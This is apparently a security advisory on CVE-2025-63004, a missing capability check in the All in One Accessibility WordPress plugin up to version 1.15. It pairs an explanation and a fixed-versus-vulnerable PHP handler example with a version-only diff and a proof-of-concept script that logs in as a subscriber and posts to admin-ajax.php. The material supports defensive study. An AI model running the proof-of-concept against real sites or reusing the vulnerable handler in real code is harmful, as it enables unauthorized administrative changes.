Atomic Edge analysis of CVE-2025-63004:
The All in One Accessibility WordPress plugin, versions up to and including 1.15, contains a missing authorization vulnerability. This flaw allows authenticated users with subscriber-level permissions or higher to perform unauthorized administrative actions. The CVSS score of 4.3 reflects a medium severity issue.
Atomic Edge research identified the root cause as a missing capability check on a specific function. The vulnerability resides in the plugin's main file, `all-in-one-accessibility.php`. The plugin's AJAX or admin-post hook handlers, which are intended for administrative use, lack a proper authorization check such as `current_user_can('manage_options')`. Because WordPress runs `wp_ajax_*` and `admin_post_*` handlers for any authenticated user unless the handler itself checks capabilities, this omission allows lower-privileged users to trigger these handlers.
An attacker with a subscriber account can exploit this by sending a crafted POST request to the WordPress administrative AJAX endpoint, `wp-admin/admin-ajax.php`, or the admin-post endpoint, `wp-admin/admin-post.php`. The request must include the specific `action` parameter that corresponds to the vulnerable function. The exact action name is not specified in the provided diff, but the attack vector follows the standard WordPress pattern for missing capability checks on privileged handlers.
The patch, released in version 1.16, adds the necessary capability check to the vulnerable function. The published diff shows only the version number increment from 1.15 to 1.16; the capability check itself is elsewhere in the plugin's codebase and is not reproduced here. The fix modifies the handler function to verify that the user has appropriate permissions, such as `manage_options`, before executing the action. Before the patch, the function executed for any authenticated user; after the patch, execution is restricted to administrators only.
Successful exploitation could allow an attacker to perform unauthorized administrative actions. The specific impact depends on the functionality of the vulnerable handler. Potential consequences include changing plugin settings, modifying accessibility widget configurations, or triggering other actions reserved for site administrators, leading to a privilege escalation scenario.
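The following is an added example, not code from the All in One Accessibility plugin or from Atomic Edge, showing the handler pattern the analysis above describes: an admin-ajax handler that relies only on the user being logged in, beside the hardened form the 1.16 fix is described as applying (capability check first, then nonce verification, then input validation). The hook names `aio_example_save_settings` / `aio_example_save_settings_fixed`, the option key `aio_example_settings` and the settings fields are hypothetical.

```php
<?php
// Added example (not the plugin's own code). Hook names, the option key
// and the settings payload are hypothetical; the WordPress APIs are real.

// --- Vulnerable pattern: every logged-in user reaches this handler. ---
// wp_ajax_{action} fires for any authenticated user. Nothing here checks
// what that user is allowed to do, so a Subscriber who POSTs
// action=aio_example_save_settings to wp-admin/admin-ajax.php runs it.
add_action( 'wp_ajax_aio_example_save_settings', 'aio_example_save_settings_vulnerable' );
function aio_example_save_settings_vulnerable() {
	// No capability check and no nonce check: being logged in is the only gate.
	$settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
	update_option( 'aio_example_settings', $settings );
	wp_send_json_success( array( 'saved' => true ) );
}

// --- Hardened pattern: authorization, CSRF check, then validation. ---
add_action( 'wp_ajax_aio_example_save_settings_fixed', 'aio_example_save_settings_fixed' );
function aio_example_save_settings_fixed() {
	// 1. Authorization: only users who may manage site options proceed.
	//    wp_send_json_error() terminates the request after sending the reply.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
	}

	// 2. CSRF protection: the request must carry a nonce minted for this
	//    action (check_ajax_referer() dies on a missing or invalid nonce).
	check_ajax_referer( 'aio_example_save_settings', 'nonce' );

	// 3. Input validation: accept only known keys with the expected types,
	//    instead of storing whatever arrived in $_POST.
	$raw      = isset( $_POST['settings'] ) ? (array) wp_unslash( $_POST['settings'] ) : array();
	$position = isset( $raw['widget_position'] ) ? sanitize_key( $raw['widget_position'] ) : 'right';
	$settings = array(
		'widget_position' => in_array( $position, array( 'left', 'right' ), true ) ? $position : 'right',
		'enabled'         => ! empty( $raw['enabled'] ),
	);

	update_option( 'aio_example_settings', $settings );
	wp_send_json_success( array( 'saved' => true ) );
}
```

The legitimate admin page that calls the hardened handler obtains its nonce with `wp_create_nonce( 'aio_example_save_settings' )` and submits it as the `nonce` field. The order matters: the capability check runs before the nonce check so that a low-privileged user receives a 403 rather than a nonce error, and both run before any input is touched, which is the property the 1.15 handler lacked.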
--- a/all-in-one-accessibility/all-in-one-accessibility.php
+++ b/all-in-one-accessibility/all-in-one-accessibility.php
@@ -4,7 +4,7 @@
* Plugin Name: All in One Accessibility
* Plugin URI: https://www.skynettechnologies.com/all-in-one-accessibility
* Description: A plugin to create ADA Accessibility
- * Version: 1.15
+ * Version: 1.16
* Requires at least: 4.9
* Requires PHP: 7.0
* Author: Skynet Technologies USA LLC
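Review bot: this hunk changes only the `Version` header in `all-in-one-accessibility.php` (1.15 to 1.16); the capability check that the advisory says the fix adds to the AJAX/admin-post handler does not appear in the diff, so the fix cannot be reviewed for correctness from what is shown. Include the handler change (the `current_user_can( 'manage_options' )` check, plus a nonce check if the handler also lacks one) in the same diff so the change is reviewable and the fixed handler can be identified.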
```php
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-63004 - All in One Accessibility <= 1.15 - Missing Authorization

// Target WordPress site URL
$target_url = 'http://target-site.com';

// Attacker's WordPress credentials (Subscriber or higher)
$username = 'attacker_user';
$password = 'attacker_pass';

// Initialize cURL session; the same handle is reused for both requests
$ch = curl_init();

// Step 1: Login to WordPress to obtain authentication cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Send unauthorized request to the vulnerable AJAX endpoint
// NOTE: The exact 'action' parameter value is not public. Replace 'vulnerable_aio_action' with the correct hook name if discovered.
// CURLOPT_POST and the cookie settings from step 1 are still in effect on $ch.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_fields = [
    'action' => 'vulnerable_aio_action', // This is the target AJAX hook
    // Add any other required parameters for the specific action here
];
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$ajax_response = curl_exec($ch);
curl_close($ch);

// Output the server's response to the unauthorized action
echo "Response from vulnerable endpoint:\n";
echo $ajax_response;
?>
```